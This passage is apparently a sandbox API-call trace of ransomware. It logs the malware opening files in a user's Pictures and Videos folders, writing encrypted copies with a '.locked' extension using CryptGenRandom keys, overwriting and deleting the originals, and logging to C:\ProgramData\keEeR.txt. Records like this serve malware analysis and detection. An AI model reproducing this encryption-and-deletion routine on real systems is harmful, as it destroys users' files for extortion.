"c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0313.183] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x125dfe94 | out: lpMode=0x125dfe94) returned 0 [0313.183] WriteFile (in: hFile=0x1e0, lpBuffer=0x12702600*, nNumberOfBytesToWrite=0x78, lpNumberOfBytesWritten=0x125dfe64, lpOverlapped=0x0 | out: lpBuffer=0x12702600*, lpNumberOfBytesWritten=0x125dfe64*=0x78, lpOverlapped=0x0) returned 1 [0313.184] CloseHandle (hObject=0x1e0) returned 1 [0313.184] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\Dju4ZgDG1-unlMg\\A3FeS_cred _Q.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\dju4zgdg1-unlmg\\a3fes_cred _q.bmp")) returned 1 [0313.380] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0313.528] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0313.529] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0313.534] SetEvent (hEvent=0x1e8) returned 1 [0313.534] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0313.653] SetEvent (hEvent=0x184) returned 1 [0313.653] SetEvent (hEvent=0x190) returned 1 [0313.653] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0314.040] SetEvent (hEvent=0x190) returned 1 [0314.041] SetEvent (hEvent=0x184) returned 1 [0314.041] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0314.047] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0314.080] SetEvent (hEvent=0x184) returned 1 [0314.080] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\Dju4ZgDG1-unlMg\\pfXi8.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\dju4zgdg1-unlmg\\pfxi8.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0314.080] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x125dbd9c | out: lpMode=0x125dbd9c) returned 0 [0314.080] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\Dju4ZgDG1-unlMg\\pfXi8.bmp.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\dju4zgdg1-unlmg\\pfxi8.bmp.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0314.103] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0314.151] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x125dbd9c | out: lpMode=0x125dbd9c) returned 0 [0314.151] SetEvent (hEvent=0x12c) returned 1 [0314.151] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0314.155] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0314.379] SetEvent (hEvent=0x1e8) returned 1 [0314.379] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0314.385] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0314.538] SetEvent (hEvent=0x12c) returned 1 [0314.538] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0314.544] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0314.551] SetEvent (hEvent=0x20c) returned 1 [0314.551] SetEvent (hEvent=0x190) returned 1 [0314.551] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0314.628] SetEvent (hEvent=0x1f0) returned 1 [0314.628] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0314.635] SetEvent (hEvent=0x214) returned 1 [0314.635] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0314.685] SetEvent (hEvent=0x14c) returned 1 [0314.685] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0314.686] SetEvent (hEvent=0x22c) returned 1 [0314.686] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0314.752] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\Dju4ZgDG1-unlMg\\pfXi8.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\dju4zgdg1-unlmg\\pfxi8.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0314.789] GetConsoleMode (in: hConsoleHandle=0x208, lpMode=0x12659e88 | out: lpMode=0x12659e88) returned 0 [0314.790] WriteFile (in: hFile=0x208, lpBuffer=0x13788000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x12659e78, lpOverlapped=0x0 | out: lpBuffer=0x13788000*, lpNumberOfBytesWritten=0x12659e78*=0xfa000, lpOverlapped=0x0) returned 1 [0314.814] CloseHandle (hObject=0x208) returned 1 [0314.814] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\Dju4ZgDG1-unlMg\\pfXi8.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\dju4zgdg1-unlmg\\pfxi8.bmp")) returned 1 [0314.823] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0314.841] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e040*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x12659a24, lpReserved=0x0 | out: lpBuffer=0x1263e040*, lpNumberOfCharsWritten=0x12659a24*=0xc) returned 1 [0314.895] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\RnC1I6fkRVRS9W.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\rnc1i6fkrvrs9w.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0314.896] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x12659d9c | out: lpMode=0x12659d9c) returned 0 [0314.896] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\RnC1I6fkRVRS9W.png.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\rnc1i6fkrvrs9w.png.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0314.896] GetConsoleMode (in: hConsoleHandle=0x208, lpMode=0x12659d9c | out: lpMode=0x12659d9c) returned 0 [0314.896] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e060 | out: pbBuffer=0x1263e060) returned 1 [0314.897] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8090 | out: pbBuffer=0x124a8090) returned 1 [0314.897] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c181 | out: pbBuffer=0x1237c181) returned 1 [0314.897] WriteFile (in: hFile=0x208, lpBuffer=0x125ea000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12659d78, lpOverlapped=0x0 | out: lpBuffer=0x125ea000*, lpNumberOfBytesWritten=0x12659d78*=0x80, lpOverlapped=0x0) returned 1 [0314.900] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3392fb30, ulCount=0x10, ulNumEntriesRemoved=0x3392fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3392fb30, ulNumEntriesRemoved=0x3392fb10) returned 0 [0314.900] SetEvent (hEvent=0x1e8) returned 1 [0314.900] SetEvent (hEvent=0x12c) returned 1 [0314.900] ReadFile (in: hFile=0x1c0, lpBuffer=0x1705c000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12659d68, lpOverlapped=0x0 | out: lpBuffer=0x1705c000*, lpNumberOfBytesRead=0x12659d68*=0x7d61, lpOverlapped=0x0) returned 1 [0314.902] WriteFile (in: hFile=0x208, lpBuffer=0x1705c000*, nNumberOfBytesToWrite=0x7d61, lpNumberOfBytesWritten=0x12659d74, lpOverlapped=0x0 | out: lpBuffer=0x1705c000*, lpNumberOfBytesWritten=0x12659d74*=0x7d61, lpOverlapped=0x0) returned 1 [0314.907] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0314.942] SetEvent (hEvent=0x150) returned 1 [0314.942] SetEvent (hEvent=0x1e8) returned 1 [0314.942] ReadFile (in: hFile=0x1c0, lpBuffer=0x1705c000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12659d68, lpOverlapped=0x0 | out: lpBuffer=0x1705c000*, lpNumberOfBytesRead=0x12659d68*=0x0, lpOverlapped=0x0) returned 1 [0314.942] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0315.137] SetEvent (hEvent=0x150) returned 1 [0315.137] SetEvent (hEvent=0x184) returned 1 [0315.137] CloseHandle (hObject=0x208) returned 1 [0315.137] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0315.362] CloseHandle (hObject=0x1c0) returned 1 [0315.362] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0315.363] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x12659e94 | out: lpMode=0x12659e94) returned 0 [0315.363] WriteFile (in: hFile=0x1c0, lpBuffer=0x125740a0*, nNumberOfBytesToWrite=0x42, lpNumberOfBytesWritten=0x12659e64, lpOverlapped=0x0 | out: lpBuffer=0x125740a0*, lpNumberOfBytesWritten=0x12659e64*=0x42, lpOverlapped=0x0) returned 1 [0315.363] CloseHandle (hObject=0x1c0) returned 1 [0315.363] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\RnC1I6fkRVRS9W.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\rnc1i6fkrvrs9w.png")) returned 1 [0315.406] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0315.412] SetEvent (hEvent=0x1f0) returned 1 [0315.412] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0315.413] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0315.429] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0315.438] SetEvent (hEvent=0x1dc) returned 1 [0315.438] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0315.478] SetEvent (hEvent=0x214) returned 1 [0315.478] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0315.479] SetEvent (hEvent=0x1b8) returned 1 [0315.479] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0315.481] WriteFile (in: hFile=0x200, lpBuffer=0x17b1a000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276fe78, lpOverlapped=0x0 | out: lpBuffer=0x17b1a000*, lpNumberOfBytesWritten=0x1276fe78*=0xfa000, lpOverlapped=0x0) returned 1 [0315.500] CloseHandle (hObject=0x200) returned 1 [0315.576] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0315.601] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0315.602] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0315.604] SetEvent (hEvent=0x1f0) returned 1 [0315.604] SetEvent (hEvent=0x22c) returned 1 [0315.604] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0315.637] SetEvent (hEvent=0x14c) returned 1 [0315.637] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0315.685] SetEvent (hEvent=0x1f0) returned 1 [0315.685] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0315.690] SetEvent (hEvent=0x190) returned 1 [0315.690] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0315.692] SetEvent (hEvent=0x22c) returned 1 [0315.692] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0315.724] SetEvent (hEvent=0x1e8) returned 1 [0315.724] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0315.726] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0315.731] SetEvent (hEvent=0x1f0) returned 1 [0315.731] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0315.762] SetEvent (hEvent=0x14c) returned 1 [0315.762] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0315.795] SetEvent (hEvent=0x1e8) returned 1 [0315.795] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0315.810] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x1) returned 0x0 [0315.812] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3392fb30, ulCount=0x10, ulNumEntriesRemoved=0x3392fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3392fb30, ulNumEntriesRemoved=0x3392fb10) returned 0 [0315.812] SetEvent (hEvent=0x150) returned 1 [0315.812] SetEvent (hEvent=0x214) returned 1 [0315.812] SetEvent (hEvent=0x184) returned 1 [0315.856] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\RnC1I6fkRVRS9W.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\rnc1i6fkrvrs9w.png"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0315.952] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0316.030] SetEvent (hEvent=0x150) returned 1 [0316.030] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x124a3e88 | out: lpMode=0x124a3e88) returned 0 [0316.030] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0316.430] WriteFile (in: hFile=0x19c, lpBuffer=0x154d2000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x124a3e78, lpOverlapped=0x0 | out: lpBuffer=0x154d2000*, lpNumberOfBytesWritten=0x124a3e78*=0xfa000, lpOverlapped=0x0) returned 1 [0316.459] CloseHandle (hObject=0x19c) returned 1 [0316.460] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\RnC1I6fkRVRS9W.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\rnc1i6fkrvrs9w.png")) returned 1 [0316.544] SetEvent (hEvent=0x1e8) returned 1 [0316.544] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x1) returned 0x102 [0316.556] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0316.556] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x1) returned 0x102 [0316.563] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0316.563] SetEvent (hEvent=0x12c) returned 1 [0316.563] SetEvent (hEvent=0x20c) returned 1 [0316.563] SetEvent (hEvent=0x1e8) returned 1 [0316.563] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0316.567] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3392fb34, ulCount=0x10, ulNumEntriesRemoved=0x3392fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3392fb34, ulNumEntriesRemoved=0x3392fb14) returned 0 [0316.567] SetEvent (hEvent=0x1e8) returned 1 [0316.567] SetEvent (hEvent=0x22c) returned 1 [0316.567] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0316.625] SetEvent (hEvent=0x1e8) returned 1 [0316.625] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0316.630] SetEvent (hEvent=0x20c) returned 1 [0316.630] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x1) returned 0x102 [0316.636] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0316.636] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x1) returned 0x102 [0316.646] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0316.646] SetEvent (hEvent=0x12c) returned 1 [0316.646] SetEvent (hEvent=0x20c) returned 1 [0316.646] SetEvent (hEvent=0x14c) returned 1 [0316.646] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0316.649] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3392fb34, ulCount=0x10, ulNumEntriesRemoved=0x3392fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3392fb34, ulNumEntriesRemoved=0x3392fb14) returned 0 [0316.649] SetEvent (hEvent=0x14c) returned 1 [0316.649] SetEvent (hEvent=0x20c) returned 1 [0316.649] SetEvent (hEvent=0x1ac) returned 1 [0316.649] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0316.794] SetEvent (hEvent=0x1e8) returned 1 [0316.794] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0316.816] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0316.899] SetEvent (hEvent=0x22c) returned 1 [0316.899] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0316.949] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e020*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x125e5a24, lpReserved=0x0 | out: lpBuffer=0x1263e020*, lpNumberOfCharsWritten=0x125e5a24*=0xc) returned 1 [0316.977] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0317.004] SetEvent (hEvent=0x1f0) returned 1 [0317.004] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0317.013] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c200*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x125e3a24, lpReserved=0x0 | out: lpBuffer=0x1234c200*, lpNumberOfCharsWritten=0x125e3a24*=0xc) returned 1 [0317.051] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UNI9RnsVnTQHak 3L.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uni9rnsvntqhak 3l.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0317.051] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x125e3d9c | out: lpMode=0x125e3d9c) returned 0 [0317.051] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UNI9RnsVnTQHak 3L.mp4.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uni9rnsvntqhak 3l.mp4.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0317.052] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x125e3d9c | out: lpMode=0x125e3d9c) returned 0 [0317.052] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c220 | out: pbBuffer=0x1234c220) returned 1 [0317.052] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12392010 | out: pbBuffer=0x12392010) returned 1 [0317.052] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702381 | out: pbBuffer=0x12702381) returned 1 [0317.052] WriteFile (in: hFile=0x1f4, lpBuffer=0x126e5000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e3d78, lpOverlapped=0x0 | out: lpBuffer=0x126e5000*, lpNumberOfBytesWritten=0x125e3d78*=0x80, lpOverlapped=0x0) returned 1 [0317.053] SetEvent (hEvent=0x14c) returned 1 [0317.053] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0317.076] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0317.325] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0317.386] SetEvent (hEvent=0x20c) returned 1 [0317.386] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0317.393] SetEvent (hEvent=0x12c) returned 1 [0317.393] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0317.396] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x125e7a24, lpReserved=0x0 | out: lpBuffer=0x125fc000*, lpNumberOfCharsWritten=0x125e7a24*=0xc) returned 1 [0317.401] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\PtKr-jmS0E4rPaGC6.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\ptkr-jms0e4rpagc6.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0317.401] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x125e7d9c | out: lpMode=0x125e7d9c) returned 0 [0317.401] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\PtKr-jmS0E4rPaGC6.swf.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\ptkr-jms0e4rpagc6.swf.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0317.550] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0317.597] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x125e7d9c | out: lpMode=0x125e7d9c) returned 0 [0317.597] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0317.618] SetEvent (hEvent=0x190) returned 1 [0317.618] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0317.618] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0317.645] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c200*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x125e5a24, lpReserved=0x0 | out: lpBuffer=0x1234c200*, lpNumberOfCharsWritten=0x125e5a24*=0xc) returned 1 [0317.654] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0317.725] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\-QGqmvZ9wX70bWC-Lq.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\-qgqmvz9wx70bwc-lq.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0317.726] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x125e5d9c | out: lpMode=0x125e5d9c) returned 0 [0317.726] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\-QGqmvZ9wX70bWC-Lq.flv.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\-qgqmvz9wx70bwc-lq.flv.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0317.726] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x125e5d9c | out: lpMode=0x125e5d9c) returned 0 [0317.726] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c240 | out: pbBuffer=0x1234c240) returned 1 [0317.726] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766060 | out: pbBuffer=0x12766060) returned 1 [0317.726] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702381 | out: pbBuffer=0x12702381) returned 1 [0317.727] WriteFile (in: hFile=0x1b0, lpBuffer=0x12718000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e5d78, lpOverlapped=0x0 | out: lpBuffer=0x12718000*, lpNumberOfBytesWritten=0x125e5d78*=0x80, lpOverlapped=0x0) returned 1 [0317.729] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x1) returned 0x0 [0317.730] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3392fb30, ulCount=0x10, ulNumEntriesRemoved=0x3392fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3392fb30, ulNumEntriesRemoved=0x3392fb10) returned 0 [0317.730] SetEvent (hEvent=0x150) returned 1 [0317.730] SetEvent (hEvent=0x1ac) returned 1 [0317.730] SetEvent (hEvent=0x214) returned 1 [0317.730] SetEvent (hEvent=0x22c) returned 1 [0317.730] ReadFile (in: hFile=0x1a4, lpBuffer=0x13134000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e5d68, lpOverlapped=0x0 | out: lpBuffer=0x13134000*, lpNumberOfBytesRead=0x125e5d68*=0x3d01, lpOverlapped=0x0) returned 1 [0317.731] WriteFile (in: hFile=0x1b0, lpBuffer=0x13134000*, nNumberOfBytesToWrite=0x3d01, lpNumberOfBytesWritten=0x125e5d74, lpOverlapped=0x0 | out: lpBuffer=0x13134000*, lpNumberOfBytesWritten=0x125e5d74*=0x3d01, lpOverlapped=0x0) returned 1 [0317.777] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0317.829] ReadFile (in: hFile=0x1a4, lpBuffer=0x13134000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e5d68, lpOverlapped=0x0 | out: lpBuffer=0x13134000*, lpNumberOfBytesRead=0x125e5d68*=0x0, lpOverlapped=0x0) returned 1 [0317.830] CloseHandle (hObject=0x1b0) returned 1 [0317.830] CloseHandle (hObject=0x1a4) returned 1 [0317.830] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, 